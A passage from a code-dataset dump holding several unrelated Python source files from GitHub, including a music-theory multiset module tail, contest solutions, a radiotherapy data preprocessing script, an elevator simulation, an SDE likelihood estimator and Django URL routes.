dialog.msgOut(lang.msgSCnoSuchSet, termObj)\n continue\n try:\n obj = Multiset(psSet, scFound)\n except error.MultisetError:\n return None # will be understood as error\n\n if read == None: # dont check response\n sc = obj.repr('sc')\n ps = obj.repr('psName')\n query = lang.TAB + 'SC %s as %s? ' % (sc, ps)\n ok = dialog.askYesNoCancel(query, 1, termObj) \n if ok != -1 and ok != 1: continue # return to top\n elif ok == -1: return None # destroy obj \n return obj\n\n def __call__(self, termObj=None, read=None):\n return self._makeObj(termObj, read)\n\n def getRange(self, setRange='all', tni=0):\n \"\"\"return a list w/ all sets returned as objects\n scObj os required for opperation\n \"\"\"\n objList = []\n for scTriple in self.scObj.getAllScTriples(setRange, tni):\n objList.append(Multiset(None, scTriple, self.scObj))\n return objList\n\n def getAllZ(self, setRange='all', tni=0, scObj=None):\n \"\"\"return a list of all Z set objects\n scObj required\"\"\"\n if scObj == None:\n scObj = SetClass()\n self.scObj = scObj\n\n objList = []\n for scTriple in self.scObj.findAllZ(setRange, tni):\n objList.append(Multiset(None, scTriple, self.scObj))\n return objList\n\n# def getAllSuperset(self, searchSetObj, setRange='all', tni=0, scObj=None):\n# \"\"\"return a list of all set objects that match search\n# scObj required\"\"\"\n# if scObj == None:\n# scObj = SetClass()\n# self.scObj = scObj\n# \n# searchResults, valueDict = searchSetObj.superSet(setRange, 0)\n# objList = [] # transform search results into objects\n# for scTriple in searchResults:\n# objList.append(Multiset(None, scTriple, self.scObj))\n# return objList, valueDict\n\n\n def getRef(self, searchStr, refType, setRange='all', tni=0):\n \"\"\"return a list of all set objects that match search\n \"\"\"\n\n objList = []\n resultList = findRef(searchStr, refType, setRange, tni)\n if resultList != None:\n for scTriple in resultList:\n objList.append(Multiset(None, scTriple))\n return objList # ordered list by incidence\n\n\n\n#-----------------------------------------------------------------||||||||||||--\n# no longer used\n# def getSet(termObj=None, read=None, scObj=None):\n# \"\"\"functional interface for object creation\"\"\"\n# # emulates old getSet method of SC\n# interObj = MultisetFactory()\n# obj = interObj(termObj, read, scObj)\n# if obj == None: # error\n# return None\n# else:\n# return obj.get('sc'), obj.get('psReal'), obj.tRef\n\n# no long used, and collides w/ baseTexture method\n# def getMultiset(termObj=None, read=None, scObj=None):\n# \"\"\"functional interface for object creation\"\"\"\n# # emulates old getSet method of SC\n# interObj = MultisetFactory()\n# return interObj(termObj, read, scObj) # may be None on error\n\n\n#-----------------------------------------------------------------||||||||||||--\n\ndef getPitch(termObj=None, read=None):\n while 1:\n if read != None:\n usrStr = read\n else:\n usrStr = dialog.askStr(\"enter a pitch or note name:\", termObj)\n if usrStr == None:\n return None\n usrStr = usrStr.lower() # make sure lower case\n try:\n obj = pitchTools.Pitch(usrStr)\n except error.PitchSyntaxError: \n if read != None: \n return None # failure\n dialog.msgOut('%sno such pitch exists.\\n' % lang.TAB, termObj)\n continue\n return obj\n\n#-----------------------------------------------------------------||||||||||||--\n\n\n\n# class TestOld:\n# def __init__(self):\n# self.testMultisetData()\n# \n# def testMultisetData(self):\n# demo = ((2,-5,3,5),(3.06,4.25,8.002),(34,),\n# (7,9,4,5,6,4,3,2,4,5,3,3,3))\n# for set in demo:\n# obj = Multiset(set)\n# print '\\n', obj, len(obj), obj.get('card')\n# for form in obj.forms:\n# print form, obj.repr(form)\n# print getattr(obj, form)\n# \n# def testMultisetTrans(self):\n# pass\n# \n# \n\n \n#-----------------------------------------------------------------||||||||||||--\nclass Test(unittest.TestCase):\n \n def runTest(self):\n pass\n \n def testDummy(self):\n self.assertEqual(True, True)\n\n\n#-----------------------------------------------------------------||||||||||||--\n\n\n\nif __name__ == '__main__':\n from athenaCL.test import baseTest\n baseTest.main(Test)\n\n\n","repo_name":"ales-tsurko/athenaCL","sub_path":"athenaCL/libATH/multiset.py","file_name":"multiset.py","file_ext":"py","file_size_in_byte":42806,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"72364093743","text":"import os.path\nimport sys\n\nINTO_FILE = False\noutput = []\n\n\ndef fast_input(file_name):\n global INTO_FILE\n if os.path.isfile(file_name):\n INTO_FILE = True\n with open(file_name, 'r') as file:\n input_lines = file.readlines()\n else:\n INTO_FILE = False\n input_lines = sys.stdin.readlines()\n\n for line in input_lines:\n yield line\n\n\nfast_input_reader = fast_input('input.txt')\n\n\ndef input():\n return fast_input_reader.__next__()\n\n\ndef print(line):\n output.append(str(line))\n\n\ndef solve():\n from collections import deque\n N, M = map(int, input().strip().split())\n graph = []\n for _ in range(N):\n graph.append(list(map(int, input().strip().split())))\n\n def get_neighbors(start_i, start_j):\n res = []\n for di, dj in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n i_, j_ = start_i, start_j\n while 0 <= i_+di < N and 0 <= j_+dj < M and graph[i_+di][j_+dj] != 1:\n i_ += di\n j_ += dj\n res.append((i_, j_, di, dj))\n return res\n\n distances = [[-1 for _ in range(M)] for _ in range(N)]\n queue = deque([(0, 0, 1, 0, 0)])\n\n while queue:\n i, j, di, dj, d = queue.popleft()\n temp_i, temp_j = i, j\n while 0 <= temp_i < N and 0 <= temp_j < M and graph[temp_i][temp_j] != 1:\n if graph[temp_i][temp_j] == 2:\n print(d)\n return\n temp_i -= di\n temp_j -= dj\n\n if distances[i][j] == -1:\n distances[i][j] = d\n for ngb_info in get_neighbors(i, j):\n queue.append((*ngb_info, d+1))\n\n\ndef main():\n solve()\n answer = '\\n'.join(output) + '\\n'\n\n if INTO_FILE:\n with open('output.txt', 'w') as output_file:\n output_file.write(answer)\n else:\n sys.stdout.write(answer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zinchse/_contests","sub_path":"yandex training 3.0/olympiad_tier/bfs/toy_labyrinth.py","file_name":"toy_labyrinth.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74599453102","text":"\nimport sys\nsys.path.append(r'..\\..')\nimport argparse\nimport os\nimport portpy.photon as pp\nimport SimpleITK as sitk\nimport numpy as np\nimport torch\nfrom skimage.transform import resize\n\n\ndef get_dataset(in_dir, case, suffix):\n filename = os.path.join(in_dir, case + suffix)\n img = None\n if os.path.exists(filename):\n img = sitk.ReadImage(filename)\n img = sitk.GetArrayFromImage(img)\n\n return img\n\n\ndef get_ct_image(ct: pp.CT):\n ct_arr = ct.ct_dict['ct_hu_3d'][0]\n ct_image = sitk.GetImageFromArray(ct_arr)\n ct_image.SetOrigin(ct.ct_dict['origin_xyz_mm'])\n ct_image.SetSpacing(ct.ct_dict['resolution_xyz_mm'])\n ct_image.SetDirection(ct.ct_dict['direction'])\n\n return ct_image\n\n\ndef resample(img, ref_image):\n resampler = sitk.ResampleImageFilter()\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetReferenceImage(ref_image)\n img = resampler.Execute(img)\n\n return img\n\n\ndef write_image(img_arr, out_dir, case, suffix, ref_ct):\n img_itk = sitk.GetImageFromArray(img_arr)\n img_itk.SetOrigin(ref_ct.GetOrigin())\n img_itk.SetSpacing(ref_ct.GetSpacing())\n img_itk.SetDirection(ref_ct.GetDirection())\n filename = os.path.join(out_dir, case + suffix)\n sitk.WriteImage(img_itk, filename)\n\n\ndef get_crop_settings_calc_box(ct: pp.CT, meta_data):\n cal_box_xyz_start = meta_data['opt_voxels']['cal_box_xyz_start']\n cal_box_xyz_end = meta_data['opt_voxels']['cal_box_xyz_end']\n ct_img = get_ct_image(ct)\n start_xyz = ct_img.TransformPhysicalPointToIndex(cal_box_xyz_start) # X,Y,Z\n end_xyz = ct_img.TransformPhysicalPointToIndex(cal_box_xyz_end) # X,Y,Z\n start_zyx = [start_xyz[2], start_xyz[1], start_xyz[0]]\n end_zyx = [end_xyz[2], end_xyz[1], end_xyz[0]]\n return start_zyx, end_zyx\n\n \ndef get_crop_settings(oar):\n # Use to get crop settings\n # Don't use cord or eso as they spread through more slices\n # If total number of slices is less than 128 then don't crop at all\n # Use start and end index from presence of any anatomy or ptv\n # If that totals more than 128 slices then leave as is.\n # If that totals less than 128 slices then add slices before and after to make total slices to 128\n\n oar1 = oar.copy()\n oar1[np.where(oar == 1)] = 0\n oar1[np.where(oar == 2)] = 0\n\n # For 2D cropping just do center cropping 256x256\n center = [0, oar.shape[1] // 2, oar1.shape[2] // 2]\n start = [0, center[1] - 150, center[2] - 150]\n end = [0, center[1] + 150, center[2] + 150]\n\n depth = oar1.shape[0]\n if depth < 128:\n start[0] = 0\n end[0] = depth\n\n return start, end\n\n first_slice = -1\n last_slice = -1\n for i in range(depth):\n frame = oar1[i]\n if np.any(frame):\n first_slice = i\n break\n for i in range(depth - 1, -1, -1):\n frame = oar1[i]\n if np.any(frame):\n last_slice = i\n break\n\n expanse = last_slice - first_slice + 1\n if expanse >= 128:\n start[0] = first_slice\n end[0] = last_slice\n\n return start, end\n\n # print('Get\\'s here')\n slices_needed = 128 - expanse\n end_slices = slices_needed // 2\n beg_slices = slices_needed - end_slices\n\n room_available = depth - expanse\n end_room_available = depth - last_slice - 1\n beg_room_available = first_slice\n\n leftover_beg = beg_room_available - beg_slices\n if leftover_beg < 0:\n end_slices += np.abs(leftover_beg)\n first_slice = 0\n else:\n first_slice = first_slice - beg_slices\n\n leftover_end = end_room_available - end_slices\n if leftover_end < 0:\n first_slice -= np.abs(leftover_end)\n last_slice = depth - 1\n else:\n last_slice = last_slice + end_slices\n\n if first_slice < 0:\n first_slice = 0\n\n start[0] = first_slice\n end[0] = last_slice\n\n return start, end\n\n\ndef crop_resize_img(img, start, end, is_mask=False):\n # Crop to setting given by start/end coordinates list, assuming depth,height,width\n\n img_cropped = img[start[0]:end[0] + 1, start[1]:end[1], start[2]:end[2]]\n img_cropped = np.moveaxis(img_cropped, 0, -1) # Slices last\n\n order = 0\n if is_mask is False:\n order = 1\n img_resized = resize(img_cropped, (128, 128, 128), order=order, preserve_range=True, anti_aliasing=False).astype(\n np.float32)\n if is_mask is True:\n img_resized = img_resized.astype(np.uint8)\n\n img_resized = np.moveaxis(img_resized, -1, 0) # Slices first again\n\n return img_resized\n\n\ndef get_torch_tensor(npy_tensor, device):\n out = torch.from_numpy(npy_tensor)\n out.to(device)\n\n return out\n\n\ndef get_dvh(dose, oar, ptv):\n # Compute and return the dvh for all 6 OAR structures\n device = torch.device('cuda:0')\n dose = get_torch_tensor(dose, device)\n oar = get_torch_tensor(oar, device).long()\n oar = torch.nn.functional.one_hot(oar, 6)[..., 1:] # Remove BG\n oar = oar.permute(3, 0, 1, 2).to(torch.float)\n ptv = get_torch_tensor(ptv, device).long().unsqueeze(dim=0)\n ptv = ptv.to(torch.float)\n oar = torch.cat((oar, ptv), axis=0)\n\n vols = torch.sum(oar, axis=(1, 2, 3))\n n_bins = 351\n hist = torch.zeros((n_bins, 6)).to(device)\n bins = torch.linspace(0, 70, n_bins)\n bin_w = bins[1] - bins[0]\n\n for i in range(bins.shape[0]):\n diff = torch.sigmoid((dose - bins[i]) / bin_w)\n diff = torch.cat(6 * [diff.unsqueeze(axis=0)]) * oar\n num = torch.sum(diff, axis=(1, 2, 3))\n hist[i] = (num / vols)\n\n hist_numpy = hist.cpu().numpy()\n bins_np = bins.cpu().numpy()\n\n return hist_numpy, bins_np\n\n\ndef process_case(ct_portpy, meta_data, ct, dose, oar, ptv, beamlet, out_dir, case):\n oar_copy = oar.copy()\n oar_copy[np.where(ptv == 1)] = 6\n\n start, end = get_crop_settings_calc_box(ct_portpy, meta_data=meta_data)\n\n ct = crop_resize_img(ct, start, end, is_mask=False)\n oar = crop_resize_img(oar, start, end, is_mask=True)\n ptv = crop_resize_img(ptv, start, end, is_mask=True)\n dose = crop_resize_img(dose, start, end, is_mask=False)\n beamlet = crop_resize_img(beamlet, start, end, is_mask=False)\n beamlet[np.where(ptv == 1)] = 60 # PTV volume set to prescribed dose\n\n # Scale PTV volume (region) in dose to have average prescibed 60 Gy\n\n num_ptv = np.sum(ptv)\n dose_copy = dose.copy()\n dose_copy *= ptv\n sum = np.sum(dose_copy)\n scale_factor = (60 * num_ptv) / sum\n\n dose_copy *= scale_factor\n\n dose[np.where(ptv == 1)] = dose_copy[np.where(ptv == 1)]\n\n ct = np.clip(ct, a_min=-1000, a_max=3071)\n ct = (ct + 1000) / 4071\n ct = ct.astype(np.float32)\n\n dose = np.clip(dose, a_min=0, a_max=70)\n\n # hist, bins = get_dvh(dose, oar, ptv)\n\n filename = os.path.join(out_dir, case)\n np.savez(filename, CT=ct, DOSE=dose, OAR=oar, PTV=ptv, BEAM=beamlet)\n\n\n# Initialize parser\nparser = argparse.ArgumentParser()\n\n# Adding optional argument\nparser.add_argument(\"--in_dir\", required=False, help=\"Enter input dir having patient folders with their dicoms\")\nparser.add_argument(\"--out_dir\", required=False, help=\"Enter out dir having patient folders with their dicoms\")\nargs, _ = parser.parse_known_args()\nin_dir = args.in_dir\nout_dir = args.out_dir\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\ncases = os.listdir(in_dir)\n\nlabels = {\n 'cord': 1,\n 'esophagus': 2,\n 'heart': 3,\n 'lung_l': 4,\n 'lung_r': 5,\n 'ptv': 1\n} # PTV will be stored separately as its extent is not mutually exclusive with other anatomies\n\nfor idx, case in enumerate(cases):\n # process all the nrrd files\n try:\n\n if case == 'Lung_Phantom_Patient_1' or case == 'Lung_Patient_8':\n # These patient doesnt include some structures. Modify code in future\n continue\n print('Processing case {}: {} of {} ...'.format(case, idx + 1, len(cases)))\n # read dicom CT and write it in out_dir\n data = pp.DataExplorer(data_dir=in_dir)\n data.patient_id = case\n meta_data = data.load_metadata()\n # Load ct and structure set for the above patient using CT and Structures class\n ct = pp.CT(data)\n ct_arr = ct.ct_dict['ct_hu_3d'][0]\n structs = pp.Structures(data)\n beams = pp.Beams(data)\n inf_matrix = pp.InfluenceMatrix(ct=ct, structs=structs, beams=beams)\n beams_1d = inf_matrix.A * np.ones((inf_matrix.A.shape[1]))\n beams_3d = inf_matrix.dose_1d_to_3d(dose_1d=beams_1d)\n beams_3d = beams_3d.astype('float16')\n\n # normalize beams_3d. Don't forget add these lines\n beams_3d = ((beams_3d - np.amin(beams_3d)) / (np.amax(beams_3d) - np.amin(beams_3d))) * 72\n planner_dose_3d = pp.convert_dose_rt_dicom_to_portpy(ct=ct,\n dose_file_name=os.path.join(in_dir, case, 'rt_dose.dcm'))\n\n # oars = ['Cord', 'Esophagus', 'Heart', 'Lung_L', 'Lung_R', 'PTV']\n oars = ['cord', 'esophagus', 'heart', 'lung_l', 'lung_r', 'ptv']\n target_oars = dict.fromkeys(oars, -1) # Will store index of target OAR contours from dicom dataset\n\n oar_mask = np.zeros(ct_arr.shape, np.uint8)\n ptv_mask = np.zeros_like(oar_mask)\n\n for k, v in target_oars.items():\n # anatomy_mask = np.zeros_like(oar_mask)\n ind = structs.structures_dict['name'].index(k.upper())\n anatomy_mask = structs.structures_dict['structure_mask_3d'][ind]\n\n if k == 'ptv':\n ptv_mask[np.where(anatomy_mask > 0)] = labels[k]\n else:\n oar_mask[np.where(anatomy_mask > 0)] = labels[k]\n\n # print('Processing case {}: {} of {} ...'.format(case, idx+1, len(cases)))\n process_case(ct_portpy=ct, meta_data=meta_data, ct=ct_arr, dose=planner_dose_3d, oar=oar_mask, ptv=ptv_mask, beamlet=beams_3d, out_dir=out_dir,\n case=case)\n except:\n print('Processing of case {} failed'.format(case))\n pass\n","repo_name":"PortPy-Project/PortPy","sub_path":"portpy/ai/preprocess/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":9973,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"91"}
+{"seq_id":"17125430153","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\ndef solve():\n A1, A2, A3, A4 = map(int, rl().split())\n if A1 < A2 and A3 > A4:\n print('YES')\n else:\n print('NO')\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/yukicoder","sub_path":"yukicoder_contest/256/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20369529803","text":"from hatch_fancy_pypi_readme._builder import build_text\nfrom hatch_fancy_pypi_readme._fragments import TextFragment\n\n\nclass TestBuildText:\n def test_single_text_fragment(self):\n \"\"\"\n A single text fragment becomes the readme.\n \"\"\"\n assert \"This is the README!\" == build_text(\n [TextFragment(\"This is the README!\")], []\n )\n\n def test_multiple_text_fragment(self):\n \"\"\"\n A multiple text fragment are concatenated without adding any\n characters.\n \"\"\"\n assert \"# Level 1\\n\\nThis is the README!\" == build_text(\n [\n TextFragment(\"# Level 1\\n\\n\"),\n TextFragment(\"This is the README!\"),\n ],\n [],\n )\n","repo_name":"hynek/hatch-fancy-pypi-readme","sub_path":"tests/test_builder.py","file_name":"test_builder.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"91"}
+{"seq_id":"71140401263","text":"#!/usr/bin/env python3\n\"\"\"command interface for namuhub\"\"\"\nimport argparse\nimport os\n\nfrom waitress import serve\n\nfrom namuhub import app\n\n__all__ = ['main']\n\ndef runserver(args):\n if args.debug:\n app.run(host=args.host, port=args.port, debug=args.debug,\n threaded=True)\n else:\n serve(app, host=args.host, port=args.port)\n\ndef collectstatic(args):\n try:\n from react import jsx\n except ImportError:\n print('Please install PyReact package:')\n print(' >>> pip install PyReact')\n exit(1)\n transformer = jsx.JSXTransformer()\n for fn in next(os.walk('namuhub/static/jsx'))[2]:\n transformer.transform('namuhub/static/jsx/{}'.format(fn),\n js_path='namuhub/static/js/{}'.format(fn))\n exit(0)\n\ndef main():\n parser = argparse.ArgumentParser(prog='namuhub')\n subparsers = parser.add_subparsers(dest='command')\n\n server_parser = subparsers.add_parser('server')\n server_parser.set_defaults(function=runserver)\n server_parser.add_argument('-H', '--host',\n default='0.0.0.0',\n help=\"host to listen. [default: %(default)s]\")\n server_parser.add_argument('-p', '--port',\n type=int,\n default=24682,\n help=\"port to listen. [default: %(default)s]\")\n server_parser.add_argument('-d', '--debug',\n default=False,\n action='store_true',\n help=\"enable debug mode. [default: %(default)s]\")\n\n assets_parser = subparsers.add_parser('collectstatic')\n assets_parser.set_defaults(function=collectstatic)\n\n args, _ = parser.parse_known_args()\n if not args.command:\n parser.print_help()\n exit(1)\n args.function(args)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ssut/namuhub","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"6179736763","text":"#!/usr/local/bin/python\n# -*- coding: latin-1 -*-\n# Kyle Falconer\n# Mesosphere Programming Challenge\n# <2013-10-07 13:24 CDT>\n\nimport optparse, sys\n\nclass elevator:\n \n def __init__(self, id):\n \"\"\"\n Instantiates a new elevator, with current floor = 1 and\n no goal floors.\n \"\"\"\n self.id = id\n self.current_floor = 1\n self.goal_floors = list()\n \n def state(self):\n \"\"\"\n Reports on the current state of this elevator.\n \"\"\"\n return [self.id, self.current_floor, self.goal_floors]\n \n def get_next_floor(self):\n temp_floor = self.current_floor\n \n \n if len(self.goal_floors) > 0:\n if isinstance(self.goal_floors[0], tuple):\n direction = self.goal_floors[0][1]\n print(\"direction: \"+str(direction))\n if direction < 0 :\n # going down\n temp_floor = temp_floor - 1\n else :\n #going up\n temp_floor = temp_floor + 1\n else:\n print(\"not a tuple!\",self.goal_floors[0])\n \n return temp_floor\n \n def update(self, cur_floor, goal_floor):\n \"\"\"\n Updates the current floor and removes from the goal floors\n any floor numbers which are equal to the current floor.\n This is analogous to having the riders of an elevator leave\n the elevator when it has reached their floor.\n \"\"\" \n self.cur_floor = cur_floor\n \n for floor in self.goal_floors:\n if self.cur_floor == floor[0]:\n self.goal_floors.remove(floor)\n \n self.goal_floors.append(goal_floor)\n\n \n \nclass elevatorControlSystem:\n \n def __init__(self, num_elevators):\n self.elevators = list()\n self.pickup_requests = list()\n for i in range(0, num_elevators):\n self.elevators.append(elevator(i))\n \n def status(self):\n \"\"\"\n Returns a list of triples, each triple containing the current \n status of an elevator. The number of triples (\"elevators\") returned \n is equal to the number of elevators in the elevator control system.\n [(Elevator ID, Floor Number, Goal Floor Number)]\n \"\"\"\n return [(e.id, e.current_floor, e.goal_floors) for e in self.elevators ]\n \n def update(self, id, cur_floor, goal_floor):\n self.elevators[id].update(cur_floor, goal_floor)\n \n def pickup(self, pickupFloor, direction):\n # pickupFloor: which floor the request comes from\n # direction: (negative for down, positive for up)\n self.pickup_requests.append((pickupFloor, direction))\n \n def step(self):\n for i in range(0, len(self.elevators)):\n \n if len(self.pickup_requests) > 0:\n pickup = self.pickup_requests.pop()\n print(\"sending pickup request \"+str(pickup)+\" to elevator \"+str(i))\n self.update(i, self.elevators[i].get_next_floor(), pickup)\n elif len(self.elevators[i].goal_floors) == 0:\n print(\"no pickup request and no goal floors for elevator \"+str(i))\n continue\n else:\n print(\"no pickup request; sending elevator \"+str(i)+\" to next goal floor\")\n self.update(i, self.elevators[i].get_next_floor(), self.elevators[i].current_floor)\n\n \n \ndef main():\n args = sys.argv[1:]\n print('number of elevators: '+ args[0])\n ecs = elevatorControlSystem(int(args[0]))\n \n while True:\n line = ''\n try:\n line = input('ecs> ')\n except EOFError:\n break\n \n if line == 'quit':\n break\n elif line == \"status\":\n print(ecs.status())\n elif line == \"step\":\n ecs.step()\n print('')\n elif line.startswith('pickup'):\n ecs.pickup(int(line.split(' ')[1]), int(line.split(' ')[2]))\n print('')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Kyle-Falconer/mesosphere-challenge","sub_path":"elevators.py","file_name":"elevators.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"2503380931","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[88]:\n\n\nimport numpy as np\nimport matplotlib.pylab as plt\nimport time\nfrom scipy import optimize\n# from numba import jit\nimport pandas as pd\n\nDim = 6 # Dimensionality of the system\nnDrift = 28 # terms for each Dimension of the drift\nnDiff = 1 #+Dim # terms for the Diffusion coefficient\n\n\n\n# let's only regard up to second order \ndef poly(x,sigma):\n x_vec=np.array([1,x[0],x[1],x[2],x[3],x[4],x[5], #7\n x[0]**2., x[0]*x[1], x[0]*x[2], x[0]*x[3], x[0]*x[4], x[0]*x[5],# 6 terms\n x[1]**2.,x[1]*x[2], x[1]*x[3], x[1]*x[4], x[1]*x[5], # 5 terms\n x[2]**2., x[2]*x[3], x[2]*x[4], x[2]*x[5], # 4 terms\n x[3]**2., x[3]*x[4], x[3]*x[5], x[4]**2., x[4]*x[5], x[5]**2]) # 6 terms\n return np.dot(sigma,x_vec) # Total: 28 terms\n\n#@jit\ndef D1(sigma,x):\n sigma = sigma[nDiff:] # without noise parameters\n sigma=sigma.reshape((Dim,-1))\n function=np.zeros((len(x),Dim))\n for i in range(Dim):\n function[:,i]=poly(x.T,sigma[i])\n return function\n\ndef DiffTerm(alpha,x):\n #x_vec = np.array([np.ones(x.shape[0])**2,x[:,0]**2, x[:,1]**2, \n # x[:,2]**2, x[:,3]**2, x[:,4]**2, x[:,5]**2])\n #return(np.dot(alpha[0:nDiff], x_vec))\n return(alpha[0])\n\n#@jit\ndef D2(alpha,x):\n return np.outer(np.eye(Dim,Dim),DiffTerm(alpha,x)).reshape((Dim,Dim,-1)) # Noise = alpha[0:nDiff]\n\n\ndef det_D2(alpha,x):\n return (DiffTerm(alpha,x)*np.ones(x.shape[0]))**Dim\n\n\ndef inv_D2(alpha,x):\n return np.outer(np.eye(Dim,Dim),\n 1/(DiffTerm(alpha,x)*np.ones(x.shape[0]) )).reshape((Dim,Dim,-1))\n\n\n# Log Likelihood and negative logL\n\ndef log_likelihood(alpha,x,dt):\n # alpha is the current set of parameters\n # x is the entire data set N x 2\n # dt is the time difference\n \n log_like = 0 # initial value of sum\n \n #calculate D1 and D2 or each position in the data x\n \n if min(alpha[0:nDiff])>0: # noise must be positive!\n \n dx = x[1:,:]-x[:-1,:] \n \n d1 = dx -D1(alpha,x)[:-1,:]*dt\n d2 = D2(alpha,x)\n d2_inv = inv_D2(alpha,x)\n d2_det = det_D2(alpha,x)[:-1]\n \n\n r = np.array([np.dot(d1[i,:],\n np.dot(d2_inv[:,:,i].T,\n d1[i,:])) for i in range(len(x)-1)])\n\n # HERE: Instead of summing all components (i.e. every time step), \n # one could just sum over a small subset to increase computation speed?\n #print((-r/(2*dt)-np.log(np.sqrt(4*np.pi*dt)**Dim*np.sqrt(d2_det))).shape)\n #log_like = (-r/(2*dt)-np.log(np.sqrt(4*np.pi*dt)**Dim*np.sqrt(d2_det))).sum()\n log_like = (-r/(2*dt)-np.log(np.sqrt(4*np.pi*dt)**Dim*np.sqrt(d2_det)))\n log_like = log_like.sum()\n return log_like\n else:\n return -np.inf\n\n\ndef neg_log_likelihood(alpha,x,dt): #L Threshold Lambdac\n return -1*log_likelihood(alpha,x,dt)\n\n\n# Log_Likelihood for after some parameters were cut off by the Threshold\n\ndef second_neg_log_likelihood(Coeff, Index,x,dt):\n # Index: Index of those coefficients which are set to 0: Boolean \n Index[0:nDiff] = False # noise NEVER cut off\n Coeff[Index] = 0\n return -1*log_likelihood(Coeff,x,dt)\n\n\n\n# BIC as goodness criterion for a threshold value\n\ndef BIC(alpha,x,dt,L): # mit Lambda Threshold\n \n logi = np.abs(alpha)>L # which are larger than Lambda?\n logi[0] = True # noise is always included\n return np.log(x[:,0].size)*np.sum( logi ) - 2*log_likelihood(alpha, x,dt )\n\n\n# Calculate BIC in the Loop with thresholding\n\ndef Loop(x, dt, L, a_Ini):\n # estimates alpha parameters based on starting values a_Ini for a given threshold L\n a_hat = optimize.minimize(neg_log_likelihood, a_Ini,args=(x,dt)) # max likelihood\n \n for i in np.arange(0,n_Cut):\n Cut = (np.abs(a_hat[\"x\"])=3.0\",\n) \n","repo_name":"darkdarcool/GitData","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"6469611082","text":"# filename: export_tree.py\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\r\n\r\n\r\n\r\ndef export():\r\n # train data\r\n train_data = pd.read_csv('traindata/clean_train_data_5.csv')\r\n X = train_data.iloc[:,1:66]\r\n y = train_data['label']\r\n \r\n feature_names = X.columns.values\r\n # decition tree\r\n dc = DecisionTreeClassifier(max_depth=5, criterion='entropy', max_features=7, random_state=1)\r\n dc.fit(X, y)\r\n \r\n export_graphviz(dc, out_file='tree.dot', feature_names=feature_names)\r\n\r\nif __name__ == '__main__':\r\n \r\n export()\r\n \r\n","repo_name":"linfang010/alitianchi","sub_path":"o2o/src/export_tree.py","file_name":"export_tree.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"35215706969","text":"import requests\n\nid = {\"id\": \"57\"}\nr = requests.get(\"http://pulse-rest-testing.herokuapp.com/roles/\", id)\nprint(r.text)\npayload = {\"name\": \"Dima\", \"type\": \"home\", \"level\": \"80\", \"book\": \"13\"}\n#r = requests.post(\"http://pulse-rest-testing.herokuapp.com/roles/\", payload)\n#print(r)\nr = r.json()\nlast = dict(r[-1])\n#id = last.items()\nid = last.get(\"id\")\nif \"Dima\" in last.get(\"name\") and \"home\" in last.get(\"type\"):\n print(\"sdfdsfsdafas\")\nprint(id)\nprint(dict.items(last))","repo_name":"v1doq/git_repo","sub_path":"Lesson 5th/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33308082710","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\nfrom panov.views import PersonEditView, RequestListView\n\n\nurlpatterns = patterns('panov.views',\n\n url(r'^$', 'index', name=\"index\"),\n url(r'^request/list/$', RequestListView.as_view(), name=\"request-list\"),\n url(r'^person/edit/(?P\\d+)/$',\n PersonEditView.as_view(),\n name=\"person-edit\"),\n url(r'^person/edit/$',\n PersonEditView.as_view(),\n name=\"person-edit-ajax\"),\n url(r'accounts/login/$', 'login', name='login'),\n url(r'accounts/logout/$', 'logout', name='logout'),\n url(r'^history/$', 'history', name=\"history\"),\n url(r'^person/edit/(?P\\d+)/upload/$',\n 'upload',\n name=\"person-upload\"),\n )\n","repo_name":"vice-versa/42cc","sub_path":"panov/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
